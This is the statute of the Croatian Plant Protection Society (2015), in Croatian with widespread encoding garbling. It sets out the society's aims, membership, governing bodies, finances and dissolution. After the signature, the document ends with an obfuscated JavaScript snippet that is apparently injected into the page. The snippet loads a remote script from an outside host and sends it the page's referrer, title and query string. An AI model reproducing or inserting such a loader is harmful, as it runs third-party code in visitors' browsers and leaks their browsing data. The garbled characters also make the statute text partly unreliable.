Na temelju A?lankaA� 13. Zakona o udrugama (“Narodne novine” broj 74/14), 15. SkupA?tina Hrvatskog druA?tva biljne zaA?tite, odrA?ana 11. veljaA?e 2015. donijela je

 

STATUT

HRVATSKOG DRUA�TVA BILJNE ZAA�TITE

OPA�E ODREDBE

A?lanak 1.

Ovim Statutom utvrA�uju se naziv, sjediA?te i podruA?je na kojem djeluje Hrvatsko druA?tvo biljne zaA?tite (u daljem tekstu: HDBZ), zastupanje, ciljevi, djelatnost kojima se ostvaruju ciljevi, ostvarivanje javnosti rada, A?lanstvo i A?lanarina; prava, obveze i stegovna odgovornost A?lanova, unutarnji ustroj udruge, tijela udruge, njihov sastav, ovlasti, naA?in odluA?ivanja, uvjeti i naA?in izbora i opoziva, trajanje mandata i odgovornost A?lanova, imovina i raspolaganje s moguA�om dobiti, naA?in stjecanja imovine te prestanak djelovanja i postupak s imovinom u sluA?aju prestanka djelovanja.

A?lanak 2.

Naziv je udruge Hrvatsko druA?tvo biljne zaA?tite.

SkraA�eni je naziv udruge HDBZ.

Uz naziv Hrvatsko druA?tvo biljne zaA?tite na prvom mjestu, Udruga moA?e rabiti i naziv na engleskom jeziku Croatian Plant Protection Society.

SkraA�eni je naziv na engleskom jeziku CPPS.

HDBZ dobrovoljna je, samostalna, znanstvena i struA?na udruga A?iji se A?lanovi bave biljnom zaA?titom.

HDBZ pravna je osoba upisana u registar udruga pri nadleA?nom tijelu drA?avne uprave.

HDBZ zastupa predsjednik/ca.

SjediA?te Udruge je u Zagrebu, SvetoA?imunska cesta 25, c/o Agronomski fakultet (AF) SveuA?iliA?ta u Zagrebu.

A?lanak 3.

HDBZ djeluje na podruA?ju Republike Hrvatske.

Rad je HDBZ javan. Javnost rada osigurava se pravodobnim i istinitim obavjeA?tavanjem A?lanova HDBZ putem Glasila biljne zaA?tite i drugim naA?inima utvrA�enim ovim Statutom.

Predstavnici sredstava javnog priopA�avanja mogu biti nazoA?ni sjednicama tijela upravljanja HDBZ-a i izvjeA?tavati javnost o radu tih tijela.

CILJEVI, PODRUA?JE DJELOVANJA SUKLADNO CILJEVIMA, DJELATNOSTI KOJIMA SE OSTVARUJU CILJEVI I ZNAK HDBZ

A?lanak 4.

Ciljevi HDBZ-a jesu:

 1. promicanje zajedniA?kih interesa za biljnu zaA?titu bez namjere stjecanja dobiti,
 2. okupljanje osoba koje se bave biljnom zaA?titom u cilju uzajamnoga znanstvenog i struA?nog pomaganja u radu,
 3. unapreA�enje biljne zaA?tite u svim njezinim segmentima,
 4. istraA?ivanje A?tetnih organizama, poglavito u Republici Hrvatskoj,
 5. predlaganje i sudjelovanje u struA?nim i znanstvenim projektima vezanim za zaA?titu bilja,
 6. zaA?tita prirode i A?ovjekova okoliA?a, promicanje integrirane i ekoloA?ke zaA?tite bilja,
 7. prouA?avanje i A?uvanje znanstvene, prirodne i kulturne baA?tine s podruA?ja biljne zaA?tite,
 8. poticanje otvaranja novih radnih mjesta na kojima se obavljaju poslovi iz podruA?ja biljne zaA?tite.

Ako u obavljanju svoje djelatnosti HDBZ ostvari dobit, ona se mora upotrijebiti iskljuA?ivo za obavljanje i unapreA�ivanje djelatnosti HDBZ-a kojima se ostvaruju njegovi ciljevi utvrA�eni Statutom.

A?lanak 5.

Ciljeve A�e HDBZ ostvariti sljedeA�im djelatnostima:

 1. organiziranje predavanja, seminara i sl. u cilju permanentne izobrazbe svojih A?lanova,
 2. informiranje struA?ne javnosti o najnovijim postignuA�ima u svijetu i Republici Hrvatskoj u podruA?ju biljne zaA?tite, primjeni i razvoju novih sredstava za biljnu zaA?titu, razvoju alternativnih mjera biljne zaA?tite, A?tetnim posljedicama zbog primjene sredstava za biljnu zaA?titu,
 3. priopA�avanje, obavjeA?tavanje i prosvjeA�ivanje graA�ana o A?tetama koje A?ine vaA?nije vrste A?tetnih organizama, o suvremenim mjerama biljne zaA?tite i opasnosti po zdravlje ljudi i okoliA?a kao moguA�im popratnim pojavama i sl.,
 4. organiziranje struA?nih teA?ajeva i savjetovanja, upoznavanje proizvoA�aA?a s osnovnim problemima i moguA�nostima biljne zaA?tite,
 5. upoznavanje drA?avnih tijela s osnovnim problemima biljne zaA?tite, potrebama i moguA�nostima njihova rjeA?avanja te s poboljA?avanjem mjesta i statusa struA?njaka za biljnu zaA?titu,
 6. poticanje znanstveno-istraA?ivaA?kog rada; organiziranje simpozija i struA?nih savjetovanja, razvijanje informacijskog sustava i uvoA�enje novih tehnoloA?kih rjeA?enja biljne zaA?tite,
 7. predlaganje i davanje miA?ljenja o svim pitanjima biljne zaA?tite drA?avnim tijelima, raznim udruA?enjima proizvoA�aA?a i svim drugim organizacijama kad se za to ukaA?e potreba,
 8. pokretanje pitanja donoA?enja, izmjena i dopuna zakonskih i podzakonskih akata te aktivno pridonoA?enje u njihovoj izradi i donoA?enju,
 9. pridonoA?enje formiranju nastavnih planova i programa na svim razinama izobrazbe struA?njaka za biljnu zaA?titu,
 10. pomaganje u ostvarivanju gospodarskih i druA?tvenih uvjeta za zapoA?ljavanje diplomiranih struA?njaka za biljnu zaA?titu,
 11. izdavanje struA?nog i/ili znanstvenog A?asopisa iz biljne zaA?tite i drugih struA?nih i/ili znanstvenih publikacija kojima se pridonosi razvoju znanosti i popularizaciji struke biljne zaA?tite,
 12. poticanje i unapreA�enje meA�unarodne suradnje na podruA?ju biljne zaA?tite,
 13. predlaganje zasluA?nih A?lanova HDBZ-a za drA?avne i ostale nagrade i priznanja.

 

Gospodarske djelatnosti HDBZ su slijedeA�e:

 1. izdavanje publikacija (A?asopisa, knjiga, zbornika i sliA?no) iz podruA?ja djelatnosti udruge sukladno posebnim propisima
 2. odrA?avanje radionica, seminara, predavanja, simpozija, savjetovanja i sliA?no

A?lanak 6.

HDBZ suraA�uje s tijelima drA?avne uprave, organizacijama, trgovaA?kim druA?tvima, muzejima, udrugama i osobama koje su zainteresirane za ostvarivanje ciljeva HDBZ-a.

HDBZ suraA�uje s drugim sliA?nim udrugama u zemlji i inozemstvu.

A?lanak 7.

HDBZ se moA?e odlukom SkupA?tine uA?laniti u srodno inozemno udruA?enje.

 

A?lanak 8.

HDBZ ima sluA?beni znak, koji predstavlja okrugli peA?at promjera 35 mm i peA?at promjera 24 mm, s natpisom Hrvatsko A�druA?tvo biljne zaA?tite, Zagreb. U krugu je okruglog peA?ata znak: slika biljke obavijene Eskulapovom zmijom, a sve zaA?tiA�eno dvjema rukama.

HDBZ zastupa i predstavlja predsjednik/ca HDBZ, a moA?e ga zastupati i dopredsjednik/ca ili tajnik Upravnog odbora, po posebnoj punomoA�i predsjednik/ca DruA?tva.

III. A?LANOVI HDBZ, PRAVA, OBVEZE I STEGOVNA ODGOVORNOST

A?lanak 9.

A?lanovi HDBZ-a mogu biti redoviti i poA?asni.

 1. Redoviti A?lan/ica HDBZ-a moA?e biti poslovno sposobna fiziA?ka osoba ili pravna osoba sa sjediA?tem u Republici Hrvatskoj. Predstavnika/cu pravne osobe u udruzi imenuje osoba ovlaA?tena za zastupanje pravne osobe.
 2. Za poA?asne A?lanove/ice HDBZ-a bira osobe koje su izvanrednim zalaganjem stekle osobite zasluge za ugled i napredak HDBZ.

A?lanak 10.

Redovite A?lanove/ice prima u A?lanstvo Upravni odbor.

A?lanak 11.

U HDBZ-u se vodi registar A?lanova/ica. Registar A?lanova vodi se elektroniA?ki, a on sadrA?i slijedeA�e podatke: osobno ime (naziv), OIB, datum roA�enja, datum pristupanja HDBZ-u, kategorija A?lanstva, datum prestanka A?lanstva. Registar A?lanova dostupan je na uvid A?lanovima i nadleA?nim tijelima.

A?lanak 12.

Postupak i kriteriji izbora poA?asnih A?lanova/ica propisani su posebnim Pravilnikom.

A?lanak 13.

Prava redovitih i poA?asnih A?lanova/ica jesu:

 1. prisustvovanje svim sastancima i skupA?tinama HDBZ-a te na njima raspravljanje, iznoA?enje prijedloga i glasovanje,
 2. biranje i pravo da budu birani u tijela HDBZ-a, druge odbore i izaslanstva,
 3. koriA?tenje svih povlastica i prava,
 4. dobivanje publikacija koje izdaje HDBZ uz cijenu odreA�enu za A?lanove.

A?lanak 14.

Svi A?lanovi/ice HDBZ-a duA?ni su:

 1. prihvatiti Statut HDBZ-a i pridrA?avati se odredaba tog Statuta i drugih opA�ih akata,
 2. A?uvati i braniti ugled HDBZ-a,
 3. aktivno sudjelovati u izvrA?avanju ciljeva HDBZ-a i pridonositi ostvarivanju djelatnosti HDBZ-a,
 4. potpomagati HDBZ u ostvarivanju zadataka i brinuti se za razvoj biljne zaA?tite u Hrvatskoj,
 5. redovito plaA�ati A?lanarinu,
 6. A?uvati imovinu HDBZ-a i savjesno ispunjavati obveze prema HDBZ-u.

A?lanak 15.

A?lanstvo u HDBZ-u prestaje:

 1. prestankom djelovanja HDBZ-a,
 2. pisanom izjavom Upravnom odboru,
 3. brisanjem iz popisa A?lanova/ica zbog neplaA�anja A?lanarine u trajanju od dvije godine i nakon pisane opomene,
 4. odlukom o iskljuA?enju, koju donosi Upravni odbor HDBZ-a.

IskljuA?eni A?lan/ica ima pravo A?albe SkupA?tini, A?ija je odluka o iskljuA?enju konaA?na.

A?lan/ica moA?e biti iskljuA?en zbog teA?eg nepoA?tivanja odredaba Statuta, A?to se utvrA�uje posebnim prijedlogom Suda A?asti.

TIJELA HDBZ

A?lanak 16.

Tijela HDBZ jesu: SkupA?tina, Upravni odbor, predsjednik/ca HDBZ-a, koji je ujedno i predsjednik/ca Upravnog odbora, Nadzorni odbor i Sud A?asti.

A?lanak 17.

SkupA?tina je najviA?e upravno tijelo HDBZ-a. SkupA?tinu saA?injavaju svi A?lanovi/ice Udruge.

A?lanak 18.

Redovita skupA?tina sastaje se jednom godiA?nje.

SkupA?tinu HDBZ-a saziva predsjednik/ca HDBZ-a, pisanim putem petnaest dana prije.

Poziv sadrA?ava podatke o mjestu i vremenu odrA?avanja te prijedlog dnevnog reda. Materijali o pitanjima koja su na dnevnom redu, moraju biti objavljeni najmanje 7 dana prije odrA?avanja skupA?tine na web stranici HDBZ-a. SkupA?tinu vodi predsjednik/ca HDBZ-a.

A?lanak 19.

Ako je valjano sazvanoj SkupA?tini nazoA?no manje od polovice svih A?lanova HDBZ-a, odgaA�a se skupA?tina za pola sata. Po isteku toga roka, skupA?tina moA?e donositi pravovaljane zakljuA?ke ako je nazoA?no deset (10) A?lanova SkupA?tine. PunovaA?ne odluke donose se veA�inom glasova nazoA?nih.

A?lanak 20.

SkupA?tina obavlja ove poslove:

 1. donosi Statut i njegove izmjene i dopune,
 2. bira i razrjeA?ava predsjednika/cu HDBZ-a,
 3. bira i razrjeA?ava A?lanove/ice Upravnog odbora, Nadzornog odbora i Suda A?asti,
 4. donosi plan rada i financijski plan za sljedeA�u kalendarsku godinu i izvjeA?A�e o radu za prethodnu kalendarsku godinu,
 5. razmatra i ocjenjuje izvjeA?A�a Upravnog odbora, Nadzornog odbora i Suda A?asti o radu i stanju HDBZ-a, o stanju blagajne i izvrA?enju financijskog plana,
 6. na prijedlog Upravnog odbora potvrA�uje poA?asnog predsjednika/cu,
 7. bira zastupnike u upravna i druga tijela drugih udruA?enja,
 8. rjeA?ava A?albe A?lanova HDBZ-a u drugom stupnju i donosi odluke o istima,
 9. donosi konaA?nu odluku o iskljuA?ivanju iz A?lanstva,
 10. donosi odluku o statusnim promjenama,
 11. odluA?uje o promjeni ciljeva i djelatnosti, prestanku djelovanja HDBZ-a i raspodjeli preostale imovine
 12. odluA?uje o drugim pitanjima vaA?nim za rad HDBZ-a, utvrA�enim ovim Statutom te za koja nije mjerodavno koje drugo tijelo HDBZ-a.

A?lanak 21.

Predsjednik/ca HDBZ-a moA?e sazvati izvanrednu SkupA?tinu na vlastitu inicijativu ili na zahtjev najmanje jedne treA�ine ukupnog broja A?lanova, s time da se odmah predloA?i dnevni red. Ako predsjednik/ca HDBZ-a ne sazove SkupA?tinu na zahtjev predlagaA?a u roku od 30 dana od dana podnesenog zahtjeva, sazvat A�e je predlagaA?/ica. Na izvanrednoj skupA?tini razmatra se samo pitanje zbog kojeg je sazvana.

U sluA?aju isteka mandata tijelima udruge, sjednicu SkupA?tine moA?e sazvati zadnja osoba za zastupanje upisana u Registar udruga Republike Hrvatske.

A?lanak 22.

SkupA?tina na izbornoj sjednici, na prijedlog aktualnog predsjednika/ce, bira predsjednika/cu HDBZ-a na vrijeme od A?etiri godine. Novoizabrani predsjednik/ca predlaA?e dopredsjednika/cu, Upravni odbor, Nadzorni odbor i Sud A?asti, koje takoA�er bira SkupA?tina na vrijeme od A?etiri godine.

A?lanak 23.

Upravni je odbor tijelo Udruge koje izvrA?ava poslove HDBZ-a izmeA�u dviju skupA?tina.

Upravni je odbor sastavljen od 13 A?lanova.

A?lanak 24.

Upravni odbor sastaje se najmanje dva puta godiA?nje. Odluke se mogu donositi ako je na sjednici nazoA?no viA?e od polovice A?lanova/ica. Odluke su Upravnog odbora pravovaljane ako ih usvoji najmanje natpoloviA?na veA�ina nazoA?nih A?lanova/ica Upravnog odbora.

A?lanak 25.

DuA?nosti i prava Upravnog odbora, jesu:

 1. biranje tajnika/ce i rizniA?ara/ke,
 2. organiziranje i provedba odluka SkupA?tine,
 3. podnoA?enje izvjeA?taja o radu SkupA?tini,
 4. predlaganje plana rada i financijskog plana,
 5. odluA?ivanje o visini A?lanarine,
 6. utvrA�ivanje prijedloga Statuta, njegovih izmjena i dopuna i drugih odluka koje donosi SkupA?tina,
 7. donoA?enje opA�ih akata,
 8. donoA?enje odluke o dodjeli nagrada i primanju u A?lanstvo,
 9. na prijedlog Suda A?asti odluA?ivanje o iskljuA?enju iz A?lanstva,
 10. utvrA�ivanje naA?ina i uvjeta organiziranja struA?nih seminara i drugih struA?nih i znanstvenih skupova, te donoA?enje odluke o visini kotizacije,
 11. briga za javno informiranje, za znanstvenu i struA?nu razinu publikacija HDBZ-a, usvajanje programa i plana izdavaA?ke djelatnosti,
 12. imenovanje glavnog urednika/ce publikacija i A?lanova uredniA?kih odbora,
 13. odreA�ivanje cijene za publikacije HDBZ-a,
 14. povjeravanje odreA�enih poslova treA�im osobama i zakljuA?ivanje ugovora s njima,
 15. obavljanje svih drugih aktivnosti za koje ga ovlasti SkupA?tina.

A?lanak 26.

DuA?nosti su predsjednika/ce HDBZ-a:

 1. zastupanje i predstavljanje HDBZ,
 2. sazivanje i predsjedavanje sjednicama Upravnog odbora i SkupA?tine,
 3. organiziranje i provoA�enje odluka Upravnog odbora i SkupA?tine,
 4. odgovorna je za podnoA?enje SkupA?tini prijedloga godiA?njeg financijskog izvjeA?A�a,
 5. dostavlja zapisnik s redovne sjednice skupA?tine nadleA?nom uredu koji vodi registar udruga,
 6. sklapa ugovore i poduzima druge pravne radnje u ime i za raA?un HDBZ-a,
 7. obavlja i druge poslove u skladu sa zakonom, statutom HDBZ-a,
 8. odgovara za zakonitost rada HDBZ-a.

Sve dopise HDBZ-a, potpisuje predsjednik/ca, a u njegovoj odsutnosti dopredsjednik/ca.

A?anak 27.

Dopredsjednik/ca HDBZ-a zamjenjuje predsjednika/cu HDBZ-a u sluA?aju odsutnosti. Dopredsjednik/ca pomaA?e predsjedniku/ci u radu i obavlja druge poslove koje mu povjeri predsjednik/ca i Upravni odbor. Mandat dopredsjednika/ce HDBZ-a traje 4 godine.

A?lanak 28.

Tajnik/ca HDBZ-a priprema nacrte prijedloga opA�ih akata koje donosi SkupA?tina, brine se o urednom voA�enju registra A?lanova/ca, vodi zapisnike sa sjednica SkupA?tine i Upravnog odbora, vodi i A?uva arhivu HDBZ-a te obavlja struA?ne i druge poslove za potrebe Upravnog odbora. Mandat tajnika/ce HDBZ-a traje 4 godine.

A?lanak 29.

RizniA?ar/ka vodi raA?unsko poslovanje HDBZ-a i evidenciju o imovini HDBZ-a. RizniA?ar/ka podnosi izvjeA?taj o raA?unskom poslovanju, stanju imovine i o broju A?lanova/ca HDBZ-a, Upravnom odboru i SkupA?tini. Mandat rizniA?ara/ke HDBZ-a traje 4 godine.

A?lanak 30.

Nadzorni odbor sastoji se od predsjednika/ce i dva A?lana. Bira ih skupA?tina i to na A?etiri godine i mogu biti birani ponovno. A?lanovi/ice izmeA�u sebe biraju predsjednika/cu. Nadzorni se odbor brine da se HDBZ-om i njegovom imovinom upravlja po odredbama Statuta i zakonito, da se blagajniA?ko poslovanje vodi uredno i propisno.

Nadzorni odbor pravovaljano odluA?uje ako je sjednici nazoA?na natpoloviA?na veA�ina njegovih A?lanova, a pravovaljane odluke donosi veA�inom glasova nazoA?nih A?lanova.

Predsjednik/ca Nadzornog odbora saziva sjednice Odbora, rukovodi njegovim radom i obavlja druge poslove koje mu povjeri Odbor ili SkupA?tina.

Nadzorni odbor ima sve ovlasti za pregled spisa i poslovnih knjiga. A?lanovi/ice Nadzornog odbora imaju pravo prisustvovati sjednicama Upravnog odbora ali bez prava odluA?ivanja.

Nadzorni odbor ima pravo zatraA?iti uvid u dokumentaciju i sve podatke o radu i poslovanju HDBZ-a. Upravni odbor i svaki A?lan HDBZ-a duA?an je bez odgaA�anja omoguA�iti uvid u zatraA?enu dokumentaciju i podatke i dati traA?ene obavijesti.

Nadzorni odbor moA?e zatraA?iti sazivanje sjednica Upravnog odbora i SkupA?tine ako utvrdi nepravilnosti u financijskom ili drugom poslovanju HDBZ-a, nemarnost u izvrA?avanju poslova ili povrede Statuta ili drugih opA�ih akata.

Nadzorni odbor podnosi godiA?njoj skupA?tini izvjeA?A�e o radu, a skupA?tini predlaA?e da se da razrjeA?nica Upravnom odboru.

A?lan/ica Nadzornog odbora ne moA?e biti A?lan/ica Upravnog odbora.

A?lanak 31.

Sud A?asti ima predsjednika/cu i dva A?lana, koje bira SkupA?tina od redovitih i poA?asnih A?lanova/ica. Biraju se na vrijeme od A?etiri godine i mogu biti birani ponovno. Sud A?asti sastaje se po potrebi. A?lanovi/ice izmeA�u sebe biraju predsjednika/cu.

Sud A?asti razmatra pisane prijave koje se odnose na nepoA?tivanje obveza A?lanova HDBZ propisanih A?lankom 14. Statuta. U sluA?aju utvrA�enih nepoA?tivanja obveza, sud A?asti, veA�inom glasova donosi odluku i podnosi prijedlog Upravnom odboru o poduzimanju mjera stegovne odgovornosti.

A?lanak 32.

Spor/sukob interesa u udruzi postoji ukoliko se radi o pravima i interesima A?lanova udruge kojima A?lanovi mogu slobodno raspolagati a koji utjeA?eA� na rad udruge u cjelini odnosno ako se ona odnose na pitanja od zajedniA?kog interesa na sve A?lanove.

Za rjeA?avanje sporova/sukoba interesa, SkupA?tina imenuje arbitraA?no vijeA�e izmeA�u A?lanova udruge. Sastav, mandat, naA?in odluA?ivanja vijeA�a ureA�uju se pravilnikom koji donosi SkupA?tina. ArbitraA?no vijeA�e u svom radu na odgovarajuA�i naA?in primjenjuje odredbe Zakona o mirenju.

Odluka arbitraA?nog vijeA�a je konaA?na.

Ako se spor/sukob interesa odnosi na odluke tijela upravljanja udrugom temeljem kojihA� se podnosi zahtjev za upis promjena u registar udruga o A?emu odluA?uje nadleA?ni ured, nezadovoljni A?lan najprije se obraA�a udruzi da rijeA?i spor/sukob interesa. Po konaA?nosti odluke arbitraA?nog vijeA�a, udruga podnosiA� nadleA?nom uredu zahtjev za upis promjena u registar udruga zajedno s odlukom arbitraA?nog vijeA�a.

A?lanak 33.

Likvidatora bira i razrjeA?ava Upravni odbor. Likvidator zastupa udrugu u postupku likvidacije te se otvaranjem likvidacijskog postupka upisuje u registar udruga kao osoba ovlaA?tena za zastupanje udruge do okonA?anja postupka likvidacije i brisanja udruge iz registra udruga.

A?lanak 34.

Funkcije su A?lanova/ica Upravnog odbora, kao i ostalih odbora i tijela, dobrovoljne i poA?asne.

Naknadu ili nagradu A?lanovi HDBZ-a mogu dobiti samo za posebne struA?ne i tehniA?ke poslove, A?ije izvoA�enje odobri Upravni odbor, iskljuA?ivo za obavljanje i unapreA�enje djelatnosti HDBZ-a.

A?lanak 35.

SkupA?tina moA?e razrijeA?iti predsjednika/cu, Upravni odbor, Nadzorni odbor, Sud A?asti i prije isteka vremena na koje su izabrani ako prekoraA?e ovlasti ili ne izvrA?avaju savjesno povjerene obveze ili na osobni zahtjev. Ako razrijeA?i cijeli Upravni odbor, Nadzorni odbor ili Sud A?asti, SkupA?tina bira novi odbor s punim mandatom, a ako razrijeA?i samo A?lanove tih odbora, SkupA?tina bira nove A?lanove/ice odbora na vrijeme do isteka mandata u A?iji su sastav birani.

Svaki A?lan/ica Upravnog odbora, Nadzornog odbora, Suda A?asti te tajnik/ca i rizniA?ar/ka, odgovaraju za rad SkupA?tini.

Svaki A?lan/ica Upravnog odbora, Nadzornog odbora, Suda A?asti, tajnik/ca i rizniA?ar/ka mogu zatraA?iti razrjeA?enje prije isteka mandata na koji su izabrani, s time da je duA?an obavljati duA?nost do donoA?enja odluke o razrjeA?enju. SkupA?tina je duA?na donijeti odluku o razrjeA?enju na prvoj sjednici.

 

A?lanak 36.

Imovina HDBZ-a sastoji se od:

 1. A?lanarina i dobrovoljnih priloga i darova,
 2. dotacija iz drA?avnog proraA?una, proraA?una opA�ina, gradova, A?upanija i fondova i drugih tijela (sponzora i dr.),
 3. pretplate i prodaje publikacija,
 4. ostalih prihoda iz djelatnosti HDBZ-a,
 5. nepokretnih i pokretnih stvari,
 6. drugih imovinskih prava.

A?lanak 37.

Mandat glavnog urednika/ce i drugih urednika/ca publikacija HDBZ-a te A?lanova/ica uredniA?kih odbora traje A?etiri godine, u istom razdoblju kao i mandat Upravnog odbora. Njihov reizbor nije ograniA?en.

Glavni urednici/ce publikacija HDBZ-a predlaA?u Upravnom odboru plan rada za tekuA�u godinu i podnose izvjeA?A�e za minulu godinu, na poA?etku tekuA�e godine.

A?lanak 38.

Financijsko poslovanje HDBZ-a obavlja se u skladu s financijskim planom koji se donosi za jednu kalendarsku godinu i vrijedi za godinu za koju je donesen.

Sredstva se mogu troA?iti samo u okviru ostvarenih prihoda. Putni troA?kovi i dnevnice isplaA�uju se do visine odobrene za tijela drA?avne uprave.

Upravni odbor moA?e povjeriti voA�enje administrativnih, financijskih i struA?nih poslova odgovarajuA�im struA?nim sluA?bama ili pojedinim osobama uz naknadu.

A?lanak 39.

HDBZ moA?e prestati s radom odlukom SkupA?tine i u drugim sluA?ajevima propisanim Zakonom o udrugama.

U sluA?aju prestanka rada temeljem odluke SkupA?tine, odluka o prestanku rada HDBZ se donosi najmanje dvotreA�inskom veA�inom ukupnog broja A?lanova.

A?lanak 40.

U sluA?aju prestanka rada HDBZ-a sva imovina HDBZ-a nakon namirenja vjerovnika i troA?kova sudskog i drugih postupaka pripast A�e prema zakljuA?ku SkupA?tine drugoj udruzi ili organizaciji sa sliA?nom svrhom. Ako HDBZ prestane s radom bez zakljuA?ka SkupA?tine, sva se imovina HDBZ-a predaje Agronomskom fakultetu SveuA?iliA?ta u Zagrebu.

A?lanak 41.

 1. a) HDBZ je jedinstvena organizacija na podruA?ju Republike Hrvatske.
 2. b) HDBZ moA?e zbog bolje povezanosti A?lanstva te boljeg rada organizirati ustrojstvene oblike po struA?nom naA?elu (sekcije).
 3. c) Sekcije se osnivaju na osnivaA?koj skupA?tini sekcije i konstituiraju se izborom svojih tijela.

Odluku o osnivanju sekcije donosi SkupA?tina HDBZ-a.

 1. d) Osnivanje i naA?in rada sekcija, regulira se opA�im aktom koji na prijedlog sekcija prihvaA�a SkupA?tina.
 2. e) A?lan/ica sekcije mora biti uA?lanjen/a u HDBZ.
 3. f) Sekcije nisu pravne osobe.
 4. STATUT I DRUGI OPA�I AKTI

A?lanak 42.

Statut je temeljni opA�i akt HDBZ i svi drugi opA�i akti moraju biti u skladu s odredbama Statuta. Nacrt izmjena i dopuna Statuta priprema i utvrA�uje Upravni odbor HDBZ-a i upuA�uje na raspravu A?lanovima. Upravni odbor HDBZ-a razmatra primjedbe i prijedloge koji su dani u raspravi, zauzima stavove o njima i utvrA�uje prijedlog statuta. Sva unutarnja pitanja HDBZ-a, kao i druga pitanja koja nisu ureA�ena Statutom, a zahtijevaju podrobnu razradu, bit A�e ureA�ena opA�im aktima koje donosi Upravni odbor.

 

PRIJELAZNE I ZAVRA�NE ODREDBE

A?lanak 43.

Ovaj Statut stupa na snagu danom donoA?enja.

 

 

Predsjednica:
prof. dr. sc. Renata BaA?ok
Opatija, 11. veljaA?e 2015.

var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}